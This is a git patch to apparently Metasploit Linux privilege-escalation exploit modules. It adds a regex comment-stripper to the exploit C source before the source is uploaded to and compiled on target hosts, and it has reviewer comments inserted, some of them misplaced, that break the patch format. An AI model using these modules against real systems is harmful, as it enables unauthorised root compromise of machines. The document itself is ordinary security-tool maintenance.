From fcb512878c19c156345d39880a6f0846749f3d55 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 16 Dec 2018 14:11:54 +0000
Subject: [PATCH] Add strip_comments method to Linux local exploits
---
 .../linux/local/af_packet_chocobo_root_priv_esc.rb | 6 +++++-
 .../linux/local/af_packet_packet_set_ring_priv_esc.rb | 6 +++++-
 .../exploits/linux/local/bpf_sign_extension_priv_esc.rb | 6 +++++-
 modules/exploits/linux/local/glibc_realpath_priv_esc.rb | 6 +++++-
 .../linux/local/nested_namespace_idmap_limit_priv_esc.rb | 8 ++++++--
 modules/exploits/linux/local/rds_priv_esc.rb | 6 +++++-
 modules/exploits/linux/local/recvmmsg_priv_esc.rb | 6 +++++-
 modules/exploits/linux/local/ufo_privilege_escalation.rb | 6 +++++-
 8 files changed, 41 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb b/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb
index 5f880fd8ef..5e4c09c1c9 100644
--- a/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb
+++ b/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb
@@ -115,6 +115,10 @@ class MetasploitModule < Msf::Exploit::Local
 cmd_exec "chmod +x #{path}"
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file)
 end
@@ -211,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Local
 executable_path = "#{base_dir}/#{executable_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile executable_path, exploit_data('chocobo_root.c')
+ upload_and_compile executable_path, strip_comments(exploit_data('chocobo_root.c'))
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
 upload_and_chmodx executable_path, exploit_data('chocobo_root')
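Review bot: `strip_comments` in the first hunk of af_packet_chocobo_root_priv_esc.rb is a regex pass, not a C lexer, so it can alter the program it is meant to leave intact. The block-comment pattern also matches a `/*` … `*/` sequence that sits inside a string or character literal, and replacing a match with `''` can fuse the tokens on either side (`int/**/x` becomes `intx`), whereas a C preprocessor replaces each comment with one space. I would substitute a space, `c_code.gsub(%r{/\*.*?\*/}m, ' ')`, and state the string-literal limitation in a comment above the method. The same definition is added in the first hunk of the other seven files in this patch; the enclosing class starts and ends outside the hunk.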
diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
index b3b0cebcc4..2c6e07a203 100644
--- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
+++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
@@ -106,6 +106,10 @@ class MetasploitModule < Msf::Exploit::Local
 cmd_exec "chmod +x #{path}"
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file)
 end
@@ -201,7 +205,7 @@ class MetasploitModule < Msf::Exploit::Local
 executable_path = "#{base_dir}/#{executable_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile executable_path, exploit_data('poc.c')
+ upload_and_compile executable_path, strip_comments(exploit_data('poc.c'))
 rm_f "#{executable_path}.c"
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
diff --git a/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb b/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb
index b6d9ff756b..0bda321148 100644
--- a/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb
+++ b/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb
@@ -131,6 +131,10 @@ class MetasploitModule < Msf::Exploit::Local
 cmd_exec "chmod +x #{path}"
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file)
 end
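Review bot: The `strip_comments` added in the first hunk of af_packet_packet_set_ring_priv_esc.rb is a byte-for-byte copy of the one added to af_packet_chocobo_root_priv_esc.rb, and the patch repeats it in eight modules in total. Any later fix to either regex then has to be applied eight times, and the copies can drift apart. Defining the method once in a mixin shared by these Linux local modules, and calling it from each `exploit` path, would keep the behaviour consistent. The class body continues outside the hunk, so whether such a shared mixin already exists cannot be seen from here.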
@@ -214,7 +218,7 @@ class MetasploitModule < Msf::Exploit::Local
 executable_path = "#{base_dir}/#{executable_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile executable_path, exploit_data('exploit.c')
+ upload_and_compile executable_path, strip_comments(exploit_data('exploit.c'))
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
 upload_and_chmodx executable_path, exploit_data('exploit.out')
diff --git a/modules/exploits/linux/local/glibc_realpath_priv_esc.rb b/modules/exploits/linux/local/glibc_realpath_priv_esc.rb
index 8d906eb751..5759fca587 100644
--- a/modules/exploits/linux/local/glibc_realpath_priv_esc.rb
+++ b/modules/exploits/linux/local/glibc_realpath_priv_esc.rb
@@ -102,6 +102,10 @@ class MetasploitModule < Msf::Exploit::Local
 cmd_exec "chmod +x #{path}"
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file)
 end
@@ -196,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Local
 @executable_path = "#{base_dir}/#{executable_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile @executable_path, exploit_data('RationalLove.c')
+ upload_and_compile @executable_path, strip_comments(exploit_data('RationalLove.c'))
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
 upload_and_chmodx @executable_path, exploit_data('RationalLove')
diff --git a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
index 21cc17a6ca..51c56909a0 100644
--- a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
+++ b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
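Review bot: The `//` pattern in `strip_comments` (glibc_realpath_priv_esc.rb, first hunk) removes only comments that occupy a whole line, so a trailing `// …` after code survives, and nothing in the patch says whether that is intended. A comment above the method would settle it, for example `# Removes /* */ blocks and whole-line // comments before live compile; trailing // comments are kept.` The module documentation should also record that the source written to the target no longer byte-matches the file under the data directory, since anyone matching on that file's hash or comment text needs to know. The pattern is identical in the other seven modules.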
@@ -119,6 +119,10 @@ class MetasploitModule < Msf::Exploit::Local
 chmod path, 0755
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file)
 end
@@ -213,8 +217,8 @@ class MetasploitModule < Msf::Exploit::Local
 subshell_path = "#{base_dir}/#{subshell_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile subuid_shell_path, exploit_data('subuid_shell.c')
- upload_and_compile subshell_path, exploit_data('subshell.c')
+ upload_and_compile subuid_shell_path, strip_comments(exploit_data('subuid_shell.c'))
+ upload_and_compile subshell_path, strip_comments(exploit_data('subshell.c'))
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
 upload_and_chmodx subuid_shell_path, exploit_data('subuid_shell.out')
diff --git a/modules/exploits/linux/local/rds_priv_esc.rb b/modules/exploits/linux/local/rds_priv_esc.rb
index fd7fdd516c..79d2f962a4 100644
--- a/modules/exploits/linux/local/rds_priv_esc.rb
+++ b/modules/exploits/linux/local/rds_priv_esc.rb
@@ -103,6 +103,10 @@ class MetasploitModule < Msf::Exploit::Local
 register_file_for_cleanup path
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file)
 end
@@ -169,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local
 executable_path = "#{base_dir}/#{executable_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile executable_path, exploit_data('rds-fail.c')
+ upload_and_compile executable_path, strip_comments(exploit_data('rds-fail.c'))
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
 arch = kernel_hardware
diff --git a/modules/exploits/linux/local/recvmmsg_priv_esc.rb b/modules/exploits/linux/local/recvmmsg_priv_esc.rb
index 6e149338ad..774d548065 100644
--- a/modules/exploits/linux/local/recvmmsg_priv_esc.rb
+++ b/modules/exploits/linux/local/recvmmsg_priv_esc.rb
@@ -89,6 +89,10 @@ class MetasploitModule < Msf::Exploit::Local
 cmd_exec "chmod +x #{path}"
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', file)
 end
@@ -160,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local
 executable_path = "#{base_dir}/#{executable_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile executable_path, exploit_data('recvmmsg.c')
+ upload_and_compile executable_path, strip_comments(exploit_data('recvmmsg.c'))
 rm_f "#{executable_path}.c"
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
diff --git a/modules/exploits/linux/local/ufo_privilege_escalation.rb b/modules/exploits/linux/local/ufo_privilege_escalation.rb
index 6042ddb51b..58dceb74a7 100644
--- a/modules/exploits/linux/local/ufo_privilege_escalation.rb
+++ b/modules/exploits/linux/local/ufo_privilege_escalation.rb
@@ -108,6 +108,10 @@ class MetasploitModule < Msf::Exploit::Local
 cmd_exec "chmod +x #{path}"
 end
 
+ def strip_comments(c_code)
+ c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+ end
+
 def exploit_data(file)
 ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file)
 end
@@ -198,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Local
 executable_path = "#{base_dir}/#{executable_name}"
 if live_compile?
 vprint_status 'Live compiling exploit on system...'
- upload_and_compile executable_path, exploit_data('exploit.c')
+ upload_and_compile executable_path, strip_comments(exploit_data('exploit.c'))
 else
 vprint_status 'Dropping pre-compiled exploit on system...'
 upload_and_chmodx executable_path, exploit_data('exploit.out')